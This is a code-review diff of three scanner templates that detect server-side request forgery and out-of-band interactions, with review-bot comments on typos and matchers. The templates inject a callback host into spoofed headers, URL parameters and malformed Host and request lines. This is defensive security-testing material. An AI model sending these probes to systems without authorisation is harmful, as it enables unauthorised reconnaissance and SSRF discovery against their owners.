- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}}
Referer: http://{{interactsh-url}}/ref
Cf-Connecting_ip: spoofed.{{interactsh-url}}
X-Real-Ip: spoofed.{{interactsh-url}}
From: root@{{interactsh-url}}
True-Client-Ip: spoofed.{{interactsh-url}}
Client-Ip: spoofed.{{interactsh-url}}
Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}}
X-Client-Ip: spoofed.{{interactsh-url}}
X-Originating-Ip: spoofed.{{interactsh-url}}
X-Wap-Profile: http://{{interactsh-url}}/wap.xml
X-Forwarded-For: spoofed.{{interactsh-url}}
Contact: root@{{interactsh-url}}
X-Forwarded-Host: spoofed.{{interactsh-url}}
X-Host: spoofed.{{interactsh-url}}
X-Forwarded-Server: spoofed.{{interactsh-url}}
X-HTTP-Host-Override: spoofed.{{interactsh-url}}
Cache-Control: no-transform
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
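Review bot: the header `Cf-Connecting_ip` mixes a hyphen and an underscore; the other headers in the block are consistently hyphenated (`X-Real-Ip`, `True-Client-Ip`), so this looks like a typo for `Cf-Connecting-Ip`. As written the header will not be recognised by any proxy honouring the hyphenated name, so that probe is silently dead.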

View File

@ -0,0 +1,21 @@
id: oob-param-based-interaction
info:
name: Parameter Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request parameters.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
- method: GET
path:
- "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
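Review bot: this template only matches `interactsh_protocol` `http`, whereas the header-based template in this same commit also matches `dns` under `matchers-condition: or`. A server that merely resolves `{{interactsh-url}}` without completing an HTTP fetch still shows that the parameter value was processed, so for consistency (and to avoid losing DNS-only hits) add the same `dns` matcher here.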

View File

@ -0,0 +1,56 @@
id: request-based-interaction
info:
name: OOB Request Based Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed DNS Name from the request.
reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
tags: oob,ssrf,generic
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET / HTTP/1.1
Host: @{{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET @{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET {{interactsh-url}}:80/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
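Review bot: the description says the server "fetched a spoofed DNS Name", but the matchers accept both `http` and `dns` interactions, so "resolved or fetched" would be accurate. Two things deserve a comment alongside `unsafe: true`: why each request needs the unsafe client (the `Host: @{{interactsh-url}}`, absolute-URI and `{{interactsh-url}}:80/` request lines are deliberately non-standard, per the referenced research), and why these raw blocks use the `|+` chomping indicator while every other raw template in this commit uses `|` (with `|+` the trailing newlines of each block are preserved, which changes how the request is terminated).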

Some files were not shown because too many files have changed in this diff